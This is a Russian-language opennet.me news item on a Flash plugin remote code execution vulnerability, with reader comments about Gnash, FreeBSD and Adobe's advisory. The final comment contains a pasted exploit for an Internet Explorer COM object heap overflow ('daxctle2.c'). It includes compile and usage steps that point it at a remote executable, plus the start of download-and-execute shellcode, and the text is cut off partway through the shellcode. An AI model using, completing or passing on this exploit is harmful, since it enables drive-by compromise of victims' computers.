Во всех версиях Adobe/Macromedia Flash плагина найдена возможность (http://www.securiteam.com/windowsntfocus/5SP0F0UJPC.html) запуска кода на машине пользователя через специально скомпонованный злоумышленником SWF файл.URL: http://www.securiteam.com/windowsntfocus/5SP0F0UJPC.html
Новость: http://www.opennet.me/opennews/art.shtml?num=8327
ATTENTION!
Max, opennet does not work under firefox -- looks like something was broken today or yesterday.
TAKE A LOOK, Please.
для этого в адобе сделали таку венечку как : кликните для акливации флеш ролика
Вообще-то, в Мелкософте.
JFYI.
Тогда уж "и в Майкрософте тоже"
у FC5 сегодня вышел апдейт для пакета flash-plugin
Господа а каково Ваше мнение о:
http://savannah.gnu.org/projects/gnash
По так сыроват будет
> Господа а каково Ваше мнение о:
> http://savannah.gnu.org/projects/gnash
> По так сыроват будетМеня интересовал из этого проекта только плугин к Огнелису. После установки упомянутого, Огнелис успешно крэшился на всех сайтах, где хоть чуточку пахло флешем.
На основании этого смело заявляю - в работе не видел, но осуждаю. :)
Версия из CVS работает неплохо. Именно на FreeBSD AMD64 и именно как к плагин к FireFox. В отличие от "родного" флеш плагина, не использует специфичные для конкретной ОС подсистемы (например ALSA). Проект конечно еще сыроват, но с Вашей то помошью он конечно же наберт нужную фкнкциональность очень быстро. На счет скорости.... у Вас наверное нет аппаратной поддержки OpenGL, попробуйте Cairo.
>Господа а каково Ваше мнение о:
>http://savannah.gnu.org/projects/gnash
>По так сыроват будетя когда искал, чем бы на AMD64 FreeBSD посмотреть flash в огнелисе, мне эту фичу в рассылках посоветовали добрые пендостанцы... ужос и кошмар. проц грузит просто немеряно, плюс, как уже сказали валит firefox на каждой второй флэшине. короче живу я без флэша и счастлив :)
Не очень понятно почему "В Linux версии..." по ссылке вообще слово Linux не упоминается.
А ты у производителя поглядел http://www.adobe.com/support/security/bulletins/apsb06-11.htmlMultiple Vulnerabilities in Adobe Flash Player 8.0.24.0 and Earlier Versions
Release Date: September 12, 2006
Vulnerability Identifier: APSB06-11
CVE Number: CVE-2006-3014, CVE-2006-3311, CVE-2006-3587, CVE-2006-3588, CVE-2006-4640Platform: All Platforms
..............^^^^^^^^^^^^^
Так я про то же. Смотри заголовок. "В **Linux** версии Flash плагина обнаружена опасная уязвимость."
А на этом сайте нас совершенно не интересуют Win* и Tiger* версии.
flash - это индустриальный стандарт.В том числе и баннеры на Opennet :)
Чем вам flash не угодил?
Лично мне как пользователю *BSD, flash неугодил отсутствием нативной поддержки. И при этом он является типо индустриальным стандартом.
*
*-----------------------------------------------------------------------
*
* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server SP4 CN
* : + Internet Explorer 6.0 SP1
* : Windows XP SP2 CN
* : + Internet Explorer 6.0 SP1 (You need some goodluck! :-)
* :
* Complie : cl daxctle2.c
* :
* Usage :d:\>daxctle2
* :
* :Usage: daxctle <URL> [htmlfile]
* :
* :d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm
* :
*
*------------------------------------------------------------------------
*/#include <stdio.h>
#include <stdlib.h>FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;// Download Exec Shellcode by nop
unsigned char sc[] =
"\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00"
"\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95"
"\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x0